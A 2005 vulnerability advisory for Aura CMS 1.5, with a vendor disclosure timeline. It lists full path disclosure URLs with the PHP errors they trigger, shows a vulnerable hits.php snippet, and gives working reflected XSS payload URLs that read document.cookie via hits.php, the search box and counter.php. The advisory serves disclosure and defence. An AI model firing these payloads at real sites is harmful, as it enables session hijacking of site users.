---------------------------------------------------------------------------
                     Vulnerabilities in Aura CMS
---------------------------------------------------------------------------

Author: y3dips
Date: Januari, 25th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv011-y3dips-2005.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

auraCMS (Content Management System)

version: 1.5
date   : 21 September 2004
lisensi: GPL - http://www.gnu.org/licenses/licenses.html#GPL

Author: Arif Supriyanto - arif@ayo.kliksini.com
        http://www.semarang.tk
	  http://www.ayo.kliksini.com
	  http://www.auracms.opensource-indonesia.com

Description:

auraCMS is a PHP script package that you to possiblity to building
a website with dynamic content easier and faster, no waste time more.


---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A. Full Path disclosures

==>> http://[site]/[aura]/?pilih=teman&id=34%60select%20all

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in
 /home/cxxo/public_html/aura/teman.php on line 9

==>> http://[site]/[aura]/?pilih=hal&id=4%60tes

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in 
 /home/cxxo/public_html/aura/hal.php on line 10


==>> http://[site]/[aura]/?pilih=arsip&topik=1%60

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in  
/home/cxxo/public_html/aura/arsip.php on line 11

B. Session ID

CMS with This version has two method of authentication (session and cookies) ,
this problem has found in session method .

There are so many variable that havent declared yet, it makes attacker could
exploit it by inputing some "character" n gaining an session id on windows pop up


for eXample

---- hits.php -----

<?
$perintah = "SELECT * FROM counter WHERE id=1";
$hasil = mysql_query( $perintah );
while ($data = mysql_fetch_row($hasil)) {
	$hits=$data[3];
}

echo "<b>$hits</b>";

?>

-------end -------

look $hits variable , do you see something interested ? yes SIR , we've found something
lets do some try


==>> http://[site]/[aura]/hits.php?&hits=%3Cscript%3Ealert(document.cookie)%3C/script%3E

then you get the session ID

another vulnerable :

in pencarian (search) input box

 + http://[site]/[aura]/index.php?query=%3Cscript%3Ealert(document.cookie)%3C/script%3E&pilih=search

also in counter module

 + http://[site]/[aura]/counter.php?theCount=%3Cscript%3Ealert(document.cookie)%3C/script%3E



p.s : Wanna know what session IDs gives you ? try google :D

---------------------------------------------------------------------------

FIx :

founded : Januari 25th 2005
reported to vendor :Februari 15th  2005
                    ;vendor respond but not yet releasing any patch
publish at securityfocus : March 2th 2005



---------------------------------------------------------------------------

Shoutz:
~~~~~~~

~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous
~ newbie_hacker@yahoogroups.com ,http://forum.ehco.or.id
~ #e-c-h-o@DALNET

---------------------------------------------------------------------------
Contact:
~~~~~~~~

     y3dips || echo|staff || y3dips[at]gmail[dot]com
     Homepage: http://y3dips.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------